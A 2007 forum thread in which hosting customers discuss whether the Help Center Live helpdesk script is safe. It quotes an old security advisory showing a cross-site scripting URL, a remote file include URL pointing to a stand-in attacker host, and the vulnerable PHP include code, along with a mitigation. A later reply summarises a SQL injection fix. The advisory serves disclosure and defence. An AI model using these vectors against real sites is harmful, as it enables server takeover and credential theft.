PDA

View Full Version : Vodahost or Navaldesign - Fantastico



davidundalicia
02-11-2007, 09:20 PM
Hi, I have just been trying out help centre live
from fantastico
and I came across this on the web....Has this been fixed or should we just dump it ?
I know its an old report, but I am still wary of continuing with this product !!

Thanks............................................ ...

Critical Vulnerability In Help Center Live
December 24, 2004

Vendor : Michael Bird
URL : http://www.helpcenterlive.com/
Version : All Versions
Risk : Multiple Vulnerabilities


Description:
Help Center Live is a `Live` help desk system written in PHP using a MySql database backend that features Live Support, Trouble Tickets and FAQ within one project. This is a very popular application, especially with webhosts and other services.


Cross Site Scripting:
Cross site scripting exists in Help Center Live. This vulnerability exists due to user supplied input not being checked properly. Below is an example.

http://path/faq/index.php?find=[CODEGOESHERE]&search=Search

This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.


File Include Vulnerability:
There lies a very dangerous file include vulnerability in help Center Live. An attacker can run system commands with the rights of the webserver by including a malicious file

http://path/inc/pipe.php?HCL_path=http://attacker

All an attacker has to do is include any malicious php code and it will be executed. Here is the vulnerable code, it is located in inc/pipe.php



$decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
include($decodemessage);


Since we call the pipe.php file directly we can now include a file as long as register globals is turned on in the php configuration settings. There is a similar in skin.php, this could be used in some circumstances to gain access to arbitrary local files and possibly more.



// Get a default inner if no inner is specified
if (!isset($SKIN_inner)) {
$SKIN_inner = "default";
}

// Get the skins
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_file = fread($handle, filesize($file));
fclose($handle);
blah_inner_default.hcl
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_inner = fread($handle, filesize($file));
fclose($handle);



Solution:
I have contacted the developer, but received no answer. My advice would be for any users running help center live to deny direct access to the /inc/ directory, as it is not needed. This can be accomplished in apache web server by configuring a .htaccess file to effectively "deny from all" and restrict access to the directory containing the vulnerable files.


Credits:
James Bercegay of the GulfTech Security Research Team

navaldesign
02-11-2007, 09:52 PM
I have only used Help Center Live aprox a year ago. At that time, issues with the php version and settings would not allow correct functioning of the script, so i simply abbandoned it. Sorry David, i cannot answer you.

davidundalicia
02-11-2007, 10:09 PM
Thanks for your quick reply George.

It seems to work OK, but I am loathe to use it if it is still a security risk.

What about the use of a htaccess file that was mentioned?
How would this be implemented ?

Thanks again.


I will await a reply from *****....................

navaldesign
02-11-2007, 10:10 PM
Found this on the net:

Description:
Some vulnerabilities have been reported in Help Center Live, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to unspecified parameters in the "osTicket" module isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Update to version 2.1.0.
http://sourceforge.net/project/showfiles.php?group_id=93857 (http://sourceforge.net/project/showfiles.php?group_id=93857)

Since Fantastico has v. 2.1.2 i suppose it is ok.



Security Focus also seems to share the same opinion:

http://www.securityfocus.com/bid/17676